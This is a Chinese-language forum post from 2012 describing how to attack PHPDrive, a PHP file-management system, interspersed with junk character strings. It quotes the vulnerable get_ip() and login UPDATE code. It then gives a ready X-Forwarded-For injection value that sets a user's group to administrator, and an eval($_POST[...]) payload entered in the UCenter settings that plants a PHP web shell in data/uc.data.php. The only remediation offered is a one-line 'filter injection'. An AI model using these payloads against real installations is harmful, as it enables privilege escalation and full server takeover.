PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
* K" B- [4 N7 E' q1 B7 s" V
! f% s1 \) B! gincludes/user.lib.php! |6 m7 o2 y+ o9 R! n$ H
行87
( g4 w9 U5 X: S4 J; @& k8 a; w _ function get_ip() {1 ^1 O7 I' |+ @! a- b) Q- r
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.- o) P* H H! T/ y3 C
在用户注册与登录 处module/disk/account.lead.php
3 R, E* ]6 u) n" g. [198行 ) \1 i$ ]& ^6 x) N0 j7 s3 v
//更新本次登录IP和时间: G4 k3 d" Z/ t# C* \( U
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生6 q, a: `1 R7 k5 z( Q8 y
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
! R, Y% x' S+ E实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.' H; K2 H' L0 O& d, M/ l1 c
后台getshell:$ M: D/ j& h# g1 ^9 _
在UCenter设置处,将UC数据库登录名填写为
: k" P# k) H8 S1 d& B3 b
& K) ^, ~3 a) d; q/ @: ^root’);eval($_POST[DisKill]);?>/*+ O( i# n3 k6 j7 {' m
可以得到一个shell,位置在 data/uc.data.php; D9 b0 d8 ?5 S M4 w9 x v$ w
& Z3 T! M9 {" d* w6 b. G; V& @6 p
修复:过滤注入
4 H; S0 n1 s) d& v6 B+ f
! s. {' Y& p7 n" r |
发表于 2012-12-31 09:18:34
收藏
支持
反对